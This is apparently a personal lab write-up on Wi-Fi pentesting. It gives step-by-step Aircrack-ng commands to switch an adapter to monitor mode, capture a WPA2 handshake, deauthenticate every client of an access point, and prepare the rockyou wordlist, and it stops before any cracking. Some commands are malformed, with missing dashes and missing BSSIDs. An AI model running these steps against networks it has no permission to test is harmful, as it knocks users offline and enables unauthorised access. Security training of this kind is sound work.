- Bash
- Python
- Aircrack-ng Suite
- Wireshark
- Alfa AWUS036ACH wireless adapter
- Set up a Wi-Fi pentesting environment
- Capture WPA2 handshake packets
- Attempt password cracking using dictionary attacks
- Document methodology and personal insights
Run the "iw dev" command to view all the available Wi-Fi interfaces. In my example the interface is wlan0. We can also see that the adapter is in managed mode:
Run the "sudo airmon-ng check kill" command. "check kill" will kill any processes that might interfere with the aircrack-ng suite:
Run the "sudo airmon-ng start wlan0" command. This will switch our interface from managed mode to monitor mode:
Run the "sudo airodump-ng wlan0mon" command to show all the detected access points:
Breakdown of the output above:
Run the command "sudo airodump-ng -w captures -bssid wlan0mon" This will create a file that writes the 802.11 frames inside the file from the specified MAC Address. There will be no indication of a captured handshake before it is actually caputred:
Run the command "sudo aireplay-ng -deauth 0 -a wlan0mon. This will deathenticate all clients on the specified access point:
When the client tries to reconnect to the target access point, the handshake will be captured:
Run the "wireshark captures-01.cap" command to open the capture-01.cap file in wireshark:
In wireshark we want to enter "eapol" as the filter to get the 4-way handshake for Wi-Fi connections. We can see that (message 2 of 4) contains the WPA Key information:
Run the "sudo airmon-ng stop wlan0mon" command to put the Wi-Fi adapter back into managed mode:
Run the "sudo gzip -d /usr/share/wordlists/rockyou.txt.gz" command to unzip the worldlist file used to crack the Wi-Fi password:
